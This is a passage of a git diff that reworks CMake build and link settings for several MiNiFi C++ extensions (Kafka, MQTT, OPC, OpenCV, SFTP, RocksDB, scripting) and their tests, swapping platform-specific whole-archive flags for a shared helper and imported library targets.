@@ -86,15 +74,15 @@
 add_test(NAME C2UpdateAgentTest COMMAND C2UpdateAgentTest "${TEST_RESOURCES}/TestHTTPGet.yml"  "${TEST_RESOURCES}/")
 add_test(NAME C2FailedUpdateTest COMMAND C2FailedUpdateTest "${TEST_RESOURCES}/TestHTTPGet.yml" "${TEST_RESOURCES}/TestBad.yml"  "${TEST_RESOURCES}/")
 add_test(NAME C2NullConfiguration COMMAND C2NullConfiguration "${TEST_RESOURCES}/TestNull.yml"  "${TEST_RESOURCES}/")
-if(OPENSSL_FOUND)
+if(NOT OPENSSL_OFF)
 add_test(NAME HttpGetIntegrationTestSecure COMMAND HttpGetIntegrationTest "${TEST_RESOURCES}/TestHTTPGetSecure.yml"  "${TEST_RESOURCES}/")
+add_test(NAME C2VerifyHeartbeatAndStopSecure COMMAND C2VerifyHeartbeatAndStop "${TEST_RESOURCES}/C2VerifyHeartbeatAndStopSecure.yml" "${TEST_RESOURCES}/")
 endif()
 add_test(NAME HttpPostIntegrationTest COMMAND HttpPostIntegrationTest "${TEST_RESOURCES}/TestHTTPPost.yml" "${TEST_RESOURCES}/")
 if (NOT APPLE)
 add_test(NAME HttpPostIntegrationTestChunked COMMAND HttpPostIntegrationTest "${TEST_RESOURCES}/TestHTTPPostChunkedEncoding.yml" "${TEST_RESOURCES}/")
 endif()
 add_test(NAME C2VerifyServeResults COMMAND C2VerifyServeResults "${TEST_RESOURCES}/C2VerifyServeResults.yml" "${TEST_RESOURCES}/")
-add_test(NAME C2VerifyHeartbeatAndStopSecure COMMAND C2VerifyHeartbeatAndStop "${TEST_RESOURCES}/C2VerifyHeartbeatAndStopSecure.yml" "${TEST_RESOURCES}/")
 add_test(NAME C2VerifyHeartbeatAndStop COMMAND C2VerifyHeartbeatAndStop "${TEST_RESOURCES}/C2VerifyHeartbeatAndStop.yml" )
 add_test(NAME HTTPSiteToSiteTests COMMAND HTTPSiteToSiteTests "${TEST_RESOURCES}/TestHTTPSiteToSite.yml" "${TEST_RESOURCES}/" "http://localhost:8099/nifi-api")
 add_test(NAME SiteToSiteRestTest COMMAND SiteToSiteRestTest "${TEST_RESOURCES}/TestSite2SiteRest.yml" "${TEST_RESOURCES}/" "http://localhost:8077/nifi-api/site-to-site")
diff --git a/extensions/jni/CMakeLists.txt b/extensions/jni/CMakeLists.txt
index ac4c3b2..4e9ee72 100644
--- a/extensions/jni/CMakeLists.txt
+++ b/extensions/jni/CMakeLists.txt
@@ -97,20 +97,16 @@
 	message("Maven could not be invoked to build the framework jar")

 endif()

 

-

-

-

+target_link_libraries (minifi-jni ${LIBMINIFI})

 

 if (APPLE)

-	target_link_libraries (minifi-jni  -Wl,-all_load ${JAVA_JVM_LIBRARY})

-else ()

-	if (WIN32)

-		target_link_libraries (minifi-jni  ${JAVA_JVM_LIBRARY})

-		target_link_libraries (minifi-jni  ${Java_LIBRARIES})

-	else()

-		target_link_libraries (minifi-jni  ${JAVA_JVM_LIBRARY})

-	endif()

-endif ()

+	target_link_libraries (minifi-jni ${JAVA_JVM_LIBRARY})

+elseif (WIN32)

+	target_link_libraries (minifi-jni ${JAVA_JVM_LIBRARY})

+	target_link_libraries (minifi-jni ${Java_LIBRARIES})

+else()

+	target_link_libraries (minifi-jni ${JAVA_JVM_LIBRARY})

+endif()

 

 

 

diff --git a/extensions/libarchive/CMakeLists.txt b/extensions/libarchive/CMakeLists.txt
index 3463999..ee83624 100644
--- a/extensions/libarchive/CMakeLists.txt
+++ b/extensions/libarchive/CMakeLists.txt
@@ -34,23 +34,9 @@
   target_link_libraries(minifi-archive-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-
-# Include UUID
 target_link_libraries(minifi-archive-extensions ${LIBMINIFI})
-target_link_libraries(minifi-archive-extensions archive_static )
-if (WIN32)
-    set_target_properties(minifi-archive-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-archive-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-archive-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-archive-extensions RapidJSON)
+target_link_libraries(minifi-archive-extensions archive_static)
 
 
 SET (ARCHIVE-EXTENSIONS minifi-archive-extensions PARENT_SCOPE)
diff --git a/extensions/librdkafka/CMakeLists.txt b/extensions/librdkafka/CMakeLists.txt
index aa74bbf..a0856ab 100644
--- a/extensions/librdkafka/CMakeLists.txt
+++ b/extensions/librdkafka/CMakeLists.txt
@@ -30,64 +30,8 @@
   target_link_libraries(minifi-rdkafka-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-  set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/kafka")
-  if (WIN32)
-  	set(BYPRODUCT "${BASE_DIR}/install/lib/rdkafka.lib")
-  else()
-  	set(BYPRODUCT "${BASE_DIR}/install/lib/librdkafka.a")
-  endif()
-
-list(APPEND CMAKE_MODULE_PATH_PASSTHROUGH_LIST "${CMAKE_SOURCE_DIR}/cmake/ssl")
-if(WIN32 OR NOT USE_SYSTEM_ZLIB)
-    list(APPEND CMAKE_MODULE_PATH_PASSTHROUGH_LIST "${CMAKE_SOURCE_DIR}/cmake/zlib/dummy")
-endif()
-string(REPLACE ";" "%" CMAKE_MODULE_PATH_PASSTHROUGH "${CMAKE_MODULE_PATH_PASSTHROUGH_LIST}")
-
-find_package(Patch REQUIRED)
-
-ExternalProject_Add(
-    kafka-external
-    URL "https://github.com/edenhill/librdkafka/archive/v1.0.1.tar.gz"
-    URL_HASH "SHA256=b2a2defa77c0ef8c508739022a197886e0644bd7bf6179de1b68bdffb02b3550"
-    PATCH_COMMAND "${Patch_EXECUTABLE}" -p1 -i "${CMAKE_SOURCE_DIR}/thirdparty/librdkafka/librdkafka-libressl.patch"
-    PREFIX "${BASE_DIR}"
-    LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
-    CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-               "-DCMAKE_INSTALL_PREFIX=${BASE_DIR}/install"
-               "-DWITH_SASL=OFF"
-               "-DWITH_SSL=ON"
-               "-DRDKAFKA_BUILD_STATIC=ON"
-               "-DRDKAFKA_BUILD_EXAMPLES=OFF"
-               "-DRDKAFKA_BUILD_TESTS=OFF"
-               "-DENABLE_LZ4_EXT=OFF"
-               "-DWITH_ZSTD=OFF"
-               "-DCMAKE_MODULE_PATH=${CMAKE_MODULE_PATH_PASSTHROUGH}"
-               "-DCMAKE_C_FLAGS=${CURL_C_FLAGS}"
-               "-DCMAKE_INSTALL_LIBDIR=lib"
-               "-DCMAKE_CXX_FLAGS=${CURL_CXX_FLAGS}"
-               "-DLIBRESSL_BIN_DIR=${LIBRESSL_BIN_DIR}"
-               "-DLIBRESSL_SRC_DIR=${LIBRESSL_SRC_DIR}"
-               "-DBYPRODUCT_PREFIX=${BYPRODUCT_PREFIX}"
-               "-DBYPRODUCT_SUFFIX=${BYPRODUCT_SUFFIX}"
-               "-DZLIB_BYPRODUCT_INCLUDE=${ZLIB_BYPRODUCT_INCLUDE}"
-               "-DZLIB_BYPRODUCT=${ZLIB_BYPRODUCT}"
-               "-DZLIB_LIBRARY=${ZLIB_LIBRARY}"
-               "-DZLIB_LIBRARIES=${ZLIB_LIBRARIES}"
-               "-DLIBRDKAFKA_STATICLIB=1"
-    EXCLUDE_FROM_ALL TRUE
-  )
-add_dependencies(kafka-external libressl-portable)
-if(WIN32 OR NOT USE_SYSTEM_ZLIB)
-    add_dependencies(kafka-external zlib-external)
-endif()
-set(KAFKA_INCLUDE "${BASE_DIR}/install/include/librdkafka/")
-set(KAFKA_LIBRARY "${BYPRODUCT}")
-add_definitions("-DLIBRDKAFKA_STATICLIB=1")
-add_dependencies(minifi-rdkafka-extensions kafka-external)
-include_directories(${ZLIB_INCLUDE_DIRS})
-include_directories(${KAFKA_INCLUDE})
-
-target_link_libraries(minifi-rdkafka-extensions ${KAFKA_LIBRARY} ${OPENSSL_LIBRARIES} ${ZLIB_LIBRARIES})
+target_link_libraries(minifi-rdkafka-extensions ${LIBMINIFI})
+target_link_libraries(minifi-rdkafka-extensions librdkafka)
 
 SET (RDKAFKA-EXTENSIONS minifi-rdkafka-extensions PARENT_SCOPE)
 
diff --git a/extensions/mqtt/CMakeLists.txt b/extensions/mqtt/CMakeLists.txt
index e1d4da9..1b7cacd 100644
--- a/extensions/mqtt/CMakeLists.txt
+++ b/extensions/mqtt/CMakeLists.txt
@@ -18,34 +18,17 @@
 #
 
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt) 
-include_directories(./controllerservice ./processors ./protocol ../../libminifi/include  ../../libminifi/include/core  ../../thirdparty/spdlog-20170710/include ../../thirdparty/concurrentqueue ../../thirdparty/)
-
-include_directories(../../thirdparty/paho.mqtt.c/src)
+include_directories(./controllerservice ./processors ./protocol ../../libminifi/include  ../../libminifi/include/core)
 
 file(GLOB SOURCES "*.cpp" "protocol/*.cpp" "processors/*.cpp" "controllerservice/*.cpp")
 
-
 set(PAHO_BUILD_STATIC "ON" CACHE STRING "" FORCE)
 
 add_library(minifi-mqtt-extensions STATIC ${SOURCES})
 set_property(TARGET minifi-mqtt-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
 
-target_link_libraries(minifi-mqtt-extensions ${CMAKE_DL_LIBS} )
-target_link_libraries(minifi-mqtt-extensions paho-mqtt3cs-static )
-
-if (WIN32)
-    set_target_properties(minifi-mqtt-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-mqtt-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-mqtt-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-mqtt-extensions ${LIBMINIFI})
+target_link_libraries(minifi-mqtt-extensions paho.mqtt.c)
 
 
 SET (MQTT-EXTENSIONS minifi-mqtt-extensions PARENT_SCOPE)
diff --git a/extensions/opc/CMakeLists.txt b/extensions/opc/CMakeLists.txt
index 9a77ca1..b9968b0 100644
--- a/extensions/opc/CMakeLists.txt
+++ b/extensions/opc/CMakeLists.txt
@@ -23,8 +23,6 @@
 
 include_directories(include)
 
-add_definitions(-DUA_ENABLE_ENCRYPTION)
-
 file(GLOB SOURCES "src/*.cpp")
 
 add_library(minifi-opc-extensions STATIC ${SOURCES})
@@ -37,21 +35,8 @@
   target_link_libraries(minifi-opc-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-target_link_libraries(minifi-opc-extensions ${CMAKE_DL_LIBS} open62541::open62541)
-
-if (WIN32)
-    set_target_properties(minifi-opc-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-opc-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-opc-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-opc-extensions ${LIBMINIFI})
+target_link_libraries(minifi-opc-extensions ${CMAKE_DL_LIBS} spdlog open62541::open62541)
 
 
 SET (OPC-EXTENSIONS minifi-opc-extensions PARENT_SCOPE)
diff --git a/extensions/opencv/CMakeLists.txt b/extensions/opencv/CMakeLists.txt
index efebf55..49d5e99 100644
--- a/extensions/opencv/CMakeLists.txt
+++ b/extensions/opencv/CMakeLists.txt
@@ -21,17 +21,12 @@
 
 file(GLOB SOURCES  "*.cpp")
 
-set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/opencv")
-set(BYPRODUCT "${CMAKE_CURRENT_BINARY_DIR}/opencv-install/")
-
 set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/opencv")
 set(BYPRODUCT "${BASE_DIR}/install")
 
-# OpenCV 4.1.0
-build_git_project(opencv-external "${BASE_DIR}" "https://github.com/opencv/opencv.git" "371bba8f54560b374fbcd47e7e02f015ac4969ad"
-        -DCMAKE_BUILD_TYPE=Release
-        -DBUILD_JAVA=OFF
-        -DBUILD_FAT_JAVA_LIB=OFF
+# OpenCV
+build_git_project(opencv-external "${BASE_DIR}" "https://github.com/opencv/opencv.git" "4.1.0"
+        ${PASSTHROUGH_CMAKE_ARGS}
         -DCMAKE_INSTALL_PREFIX=${BYPRODUCT}
         -DBUILD_SHARED_LIBS=OFF
         -DBUILD_EXAMPLES=OFF
@@ -55,20 +50,28 @@
         -DBUILD_opencv_stitching=ON
         -DBUILD_opencv_video=ON
         -DBUILD_opencv_videoio=ON
-        -DWITH_1394=OFF
+	-DBUILD_JAVA=OFF
+        -DBUILD_FAT_JAVA_LIB=OFF
+        -DBUILD_ZLIB=OFF
+	-DWITH_1394=OFF
         -DWITH_FFMPEG=OFF
         -DWITH_GSTREAMER=OFF
         -DWITH_GTK=OFF
         -DWITH_IPP=OFF
         -DWITH_JASPER=OFF
         -DWITH_OPENEXR=OFF
-        -DWITH_ITT=OFF)
+        -DWITH_ITT=OFF
+        -DWITH_OPENEXR=OFF
+        -DWITH_WEBP=OFF
+        -DWITH_TIFF=OFF)
 
 add_library(minifi-opencv STATIC ${SOURCES})
 
+target_link_libraries(minifi-opencv ${LIBMINIFI})
+
 set(OpenCV_DIR ${BASE_DIR})
-find_package( OpenCV REQUIRED PATHS "${BASE_DIR}/opencv-external/src/opencv-external-build/")
-target_link_libraries( minifi-opencv ${OpenCV_LIBS} )
+find_package(OpenCV REQUIRED PATHS "${BASE_DIR}/opencv-external/src/opencv-external-build/")
+target_link_libraries(minifi-opencv ${OpenCV_LIBS})
 include_directories(${OpenCV_INCLUDE_DIRS})
 
 SET (OPENCV-EXTENSION minifi-opencv PARENT_SCOPE)
diff --git a/extensions/opencv/tests/CMakeLists.txt b/extensions/opencv/tests/CMakeLists.txt
index 34693db..d0e1b03 100644
--- a/extensions/opencv/tests/CMakeLists.txt
+++ b/extensions/opencv/tests/CMakeLists.txt
@@ -21,23 +21,13 @@
 
 SET(OPENCV_TEST_COUNT 0)
 
-if (WIN32)
-	set(LINK_FLAGS "/WHOLEARCHIVE")
-	set(LINK_END_FLAGS "")
-elseif (APPLE)
-	set(LINK_FLAGS "-Wl,-all_load")
-	set(LINK_END_FLAGS "")
-else ()
-	set(LINK_FLAGS "-Wl,--whole-archive")
-	set(LINK_END_FLAGS "-Wl,--no-whole-archive")
-endif ()
-
 FOREACH(testfile ${OPENCV_TESTS})
 	get_filename_component(testfilename "${testfile}" NAME_WE)
 	add_executable("${testfilename}" "${testfile}")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/opencv/")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
-	target_link_libraries (${testfilename} ${LINK_FLAGS} minifi-opencv minifi-standard-processors ${LINK_END_FLAGS})
+	target_wholearchive_library(${testfilename} minifi-opencv)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	createTests("${testfilename}")
 	MATH(EXPR OPENCV_TEST_COUNT "${OPENCV_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
diff --git a/extensions/pcap/CMakeLists.txt b/extensions/pcap/CMakeLists.txt
index e2234a5..25d89cb 100644
--- a/extensions/pcap/CMakeLists.txt
+++ b/extensions/pcap/CMakeLists.txt
@@ -62,22 +62,14 @@
 

 add_dependencies(minifi-pcap pcappp)

 

-if (WIN32)

-	target_link_libraries (minifi-pcap ${PCAP_LIBRARIES} ${PCAPPLUSPLUS_LIB_DIR}/libPcap++.a ${PCAPPLUSPLUS_LIB_DIR}/libPacket++.a ${PCAPPLUSPLUS_LIB_DIR}/libCommon++.a )

-    set_target_properties(minifi-pcap PROPERTIES

-        LINK_FLAGS "/WHOLEARCHIVE"

-    )

-elseif (APPLE)

-	target_link_libraries (minifi-pcap -Wl,-all_load ${PCAP_LIBRARIES} ${PCAPPLUSPLUS_LIB_DIR}/libPcap++.a ${PCAPPLUSPLUS_LIB_DIR}/libPacket++.a ${PCAPPLUSPLUS_LIB_DIR}/libCommon++.a )

+target_link_libraries (minifi-pcap ${PCAP_LIBRARIES} ${PCAPPLUSPLUS_LIB_DIR}/libPcap++.a ${PCAPPLUSPLUS_LIB_DIR}/libPacket++.a ${PCAPPLUSPLUS_LIB_DIR}/libCommon++.a)

+if (APPLE)

 	target_link_libraries(minifi-pcap "-framework CoreFoundation")

 	target_link_libraries(minifi-pcap "-framework SystemConfiguration")

-	set_target_properties(minifi-pcap PROPERTIES LINK_FLAGS "-Wl,-F/Library/Frameworks -Wl,-all_load")

-else ()

-	target_link_libraries (minifi-pcap ${PCAPPLUSPLUS_LIB_DIR}/libPcap++.a ${PCAPPLUSPLUS_LIB_DIR}/libPacket++.a ${PCAPPLUSPLUS_LIB_DIR}/libCommon++.a ${PCAP_LIBRARIES})

+	set_target_properties(minifi-pcap PROPERTIES LINK_FLAGS "-Wl,-F/Library/Frameworks")

 endif ()

 

-target_link_libraries(minifi-pcap ${LIBMINIFI} )

-target_link_libraries(minifi-pcap ${CMAKE_DL_LIBS} )

+target_link_libraries(minifi-pcap ${LIBMINIFI})

 

 SET (PCAP-EXTENSION minifi-pcap PARENT_SCOPE)

 register_extension(minifi-pcap)

diff --git a/extensions/rocksdb-repos/CMakeLists.txt b/extensions/rocksdb-repos/CMakeLists.txt
index 56ec15e..9bf81bb 100644
--- a/extensions/rocksdb-repos/CMakeLists.txt
+++ b/extensions/rocksdb-repos/CMakeLists.txt
@@ -19,15 +19,6 @@
 
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt) 
 
-find_package(RocksDB)
-
-if (NOT ROCKSDB_FOUND OR BUILD_ROCKSDB)
-	include_directories(${ROCKSDB_THIRDPARTY_ROOT}/include)
-else()
-	include_directories(${ROCKSDB_INCLUDE_DIR})
-endif()
-
-
 file(GLOB SOURCES  "*.cpp")
 
 add_library(minifi-rocksdb-repos STATIC ${SOURCES})
@@ -39,32 +30,8 @@
   target_link_libraries(minifi-rocksdb-repos "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-
 target_link_libraries(minifi-rocksdb-repos ${LIBMINIFI})
-target_link_libraries(minifi-rocksdb-repos ${CMAKE_DL_LIBS} )
-if (ROCKSDB_FOUND AND NOT BUILD_ROCKSDB)
-	target_link_libraries(minifi-rocksdb-repos ${ROCKSDB_LIBRARIES} )
-else()
-	target_link_libraries(minifi-rocksdb-repos rocksdb )
-endif()
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-rocksdb-repos ${ZLIB_LIBRARIES})
-if (WIN32)
-    set_target_properties(minifi-rocksdb-repos PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-rocksdb-repos PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-rocksdb-repos PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
+target_link_libraries(minifi-rocksdb-repos RocksDB::RocksDB)
 
 SET (ROCKSDB-REPOS minifi-rocksdb-repos PARENT_SCOPE)
-
 register_extension(minifi-rocksdb-repos)
diff --git a/extensions/script/CMakeLists.txt b/extensions/script/CMakeLists.txt
index a82b2aa..22a4cd8 100644
--- a/extensions/script/CMakeLists.txt
+++ b/extensions/script/CMakeLists.txt
@@ -53,9 +53,6 @@
 endif()
 
 target_link_libraries(minifi-script-extensions ${LIBMINIFI})
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-target_link_libraries(minifi-script-extensions ${CMAKE_DL_LIBS})
 
 if (NOT DISABLE_PYTHON_SCRIPTING)
     find_package(PythonLibs 3.5)
@@ -72,7 +69,8 @@
     file(GLOB PY_SOURCES  "python/*.cpp")
     add_library(minifi-python-extensions STATIC ${PY_SOURCES})
 
-    target_link_libraries(minifi-python-extensions ${LIBMINIFI} ${PYTHON_LIBRARIES})
+    target_link_libraries(minifi-python-extensions ${LIBMINIFI})
+    target_link_libraries(minifi-python-extensions ${PYTHON_LIBRARIES})
     target_link_libraries(minifi-script-extensions minifi-python-extensions)
 endif()
 
@@ -80,7 +78,6 @@
     find_package(Lua REQUIRED)
 
     include_directories(${LUA_INCLUDE_DIR})
-    include_directories(../../thirdparty/sol2-2.20.0)
 
     include_directories(lua)
     add_definitions(-DLUA_SUPPORT)
@@ -88,24 +85,11 @@
     file(GLOB LUA_SOURCES  "lua/*.cpp")
     add_library(minifi-lua-extensions STATIC ${LUA_SOURCES})
 
-    target_link_libraries(minifi-lua-extensions ${LUA_LIBRARIES})
+    target_link_libraries(minifi-lua-extensions ${LIBMINIFI})
+    target_link_libraries(minifi-lua-extensions ${LUA_LIBRARIES} sol)
     target_link_libraries(minifi-script-extensions minifi-lua-extensions)
 endif()
 
-if (WIN32)
-    set_target_properties(minifi-script-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-script-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-script-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
 SET (SCRIPTING-EXTENSIONS minifi-script-extensions PARENT_SCOPE)
 
 register_extension(minifi-script-extensions)
diff --git a/extensions/sensors/CMakeLists.txt b/extensions/sensors/CMakeLists.txt
index 5e5bf64..e78ff08 100644
--- a/extensions/sensors/CMakeLists.txt
+++ b/extensions/sensors/CMakeLists.txt
@@ -32,21 +32,7 @@
   target_link_libraries(minifi-sensors "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-target_link_libraries(minifi-sensors ${LIBMINIFI} )
-
-if (WIN32)
-    set_target_properties(minifi-sensors PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-sensors PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-sensors PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-sensors ${LIBMINIFI})
 
 add_dependencies(minifi-sensors RTIMULib)
 target_link_libraries(minifi-sensors RTIMULib)
diff --git a/extensions/sftp/CMakeLists.txt b/extensions/sftp/CMakeLists.txt
index 47ea7bc..48a7012 100644
--- a/extensions/sftp/CMakeLists.txt
+++ b/extensions/sftp/CMakeLists.txt
@@ -17,8 +17,6 @@
 # under the License.
 #
 
-find_package(CURL REQUIRED)
-
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt)
 include_directories(client processors)
 
@@ -33,62 +31,9 @@
 	target_link_libraries(minifi-sftp "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-if (CURL_FOUND)
-	include_directories(${CURL_INCLUDE_DIRS})
-	if (WIN32)
-		message("Including ${CURL_LIBRARY}")
-		target_link_libraries (minifi-sftp ${CURL_LIBRARY})
-		set_target_properties(minifi-sftp PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${CURL_LIBRARY}")
-	else()
-		target_link_libraries(minifi-sftp ${CURL_LIBRARIES})
-	endif()
-endif ()
-
 target_link_libraries(minifi-sftp ${LIBMINIFI})
 
-# Include OpenSSL
-set(OPENSSL_USE_STATIC_LIBS TRUE)
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-
-target_link_libraries(minifi-sftp ${CMAKE_DL_LIBS})
-
-# Include LibSSH2
-find_package(LibSSH2 REQUIRED)
-include_directories(${LIBSSH2_INCLUDE_DIR})
-target_link_libraries(minifi-sftp ${LIBSSH2_LIBRARY})
-
-# Include zlib
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries(minifi-sftp ${ZLIB_LIBRARIES})
-
-# Include RapidJSON
-include_directories(thirdparty/rapidjson-1.1.0/include)
-
-if (WIN32)
-message("${OPENSSL_LIBRARIES}")
-	set (WIN32_ARCHIVES "")
-		foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-		if (WIN32)
-		if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-				message( FATAL "Including ${OPENSSL_LIB}")
-		set_target_properties(minifi-sftp PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-		endif()
-	endif()
-	endforeach()
-
-elseif (APPLE)
-	target_link_libraries(minifi-sftp ${OPENSSL_LIBRARIES})
-    set_target_properties(minifi-sftp PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-	message("${OPENSSL_LIBRARIES}")
-	foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-		target_link_libraries (minifi-sftp ${OPENSSL_LIB})
-	endforeach()
-endif ()
+target_link_libraries(minifi-sftp CURL::libcurl libssh2 RapidJSON)
 
 SET (SFTP minifi-sftp PARENT_SCOPE)
 register_extension(minifi-sftp)
diff --git a/extensions/sftp/tests/CMakeLists.txt b/extensions/sftp/tests/CMakeLists.txt
index d350dbd..e12970c 100644
--- a/extensions/sftp/tests/CMakeLists.txt
+++ b/extensions/sftp/tests/CMakeLists.txt
@@ -29,7 +29,6 @@
 	FOREACH(testfile ${SFTP_INTEGRATION_TESTS})
 		get_filename_component(testfilename "${testfile}" NAME_WE)
 		add_executable("${testfilename}" "${testfile}")
-		target_include_directories(${testfilename} BEFORE PRIVATE ${CURL_INCLUDE_DIRS})
 		target_include_directories(${testfilename} BEFORE PRIVATE ${LIBSSH2_INCLUDE_DIR})
 		target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
 		target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors/processors")
@@ -42,16 +41,12 @@
 		target_include_directories(${testfilename} BEFORE PRIVATE ./include)
 		target_include_directories(${testfilename} BEFORE PRIVATE ./tools)
 
-		# need to add reference to minifi to get EL support for these tests.
-		# these tests aren't valid without EL
-		if (APPLE)
-			target_link_libraries (${testfilename} -Wl,-all_load ${LIBSSH2_LIBRARY} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES}  minifi-expression-language-extensions minifi-sftp minifi-standard-processors sftp-test-tools)
-		else ()
-			target_link_libraries (${testfilename} -Wl,--whole-archive ${LIBSSH2_LIBRARY} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES}  minifi-expression-language-extensions minifi-sftp minifi-standard-processors sftp-test-tools -Wl,--no-whole-archive)
-		endif ()
-
 		createTests("${testfilename}")
-		target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
+		target_link_libraries(${testfilename} ${CATCH_MAIN_LIB} minifi sftp-test-tools)
+		target_wholearchive_library(${testfilename} minifi-sftp)
+		target_wholearchive_library(${testfilename} minifi-expression-language-extensions)
+		target_wholearchive_library(${testfilename} minifi-standard-processors)
+
 		MATH(EXPR SFTP-EXTENSIONS_TEST_COUNT "${SFTP-EXTENSIONS_TEST_COUNT}+1")
 		add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 	ENDFOREACH()
diff --git a/extensions/sftp/tests/tools/CMakeLists.txt b/extensions/sftp/tests/tools/CMakeLists.txt
index da76eb9..c42fe0d 100644
--- a/extensions/sftp/tests/tools/CMakeLists.txt
+++ b/extensions/sftp/tests/tools/CMakeLists.txt
@@ -21,21 +21,13 @@
 
 add_library(sftp-test-tools STATIC ${SOURCES})
 
-target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/catch")
-target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/cron")
-target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/spdlog-20170710/include")
-target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-0.5.3/include")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/include")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/core")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/io")
 
-if (APPLE)
-    target_link_libraries (sftp-test-tools -Wl,-all_load minifi-sftp minifi-standard-processors)
-else ()
-    target_link_libraries (sftp-test-tools -Wl,--whole-archive minifi-sftp minifi-standard-processors -Wl,--no-whole-archive)
-endif ()
+target_link_libraries(sftp-test-tools minifi)
 
 set(SFTP_TEST_SERVER_JAR_SOURCE "${CMAKE_SOURCE_DIR}/extensions/sftp/tests/tools/sftp-test-server")
 set(SFTP_TEST_SERVER_JAR_BIN "${CMAKE_CURRENT_BINARY_DIR}/" )
diff --git a/extensions/sqlite/CMakeLists.txt b/extensions/sqlite/CMakeLists.txt
index 3bef06f..b97a38f 100644
--- a/extensions/sqlite/CMakeLists.txt
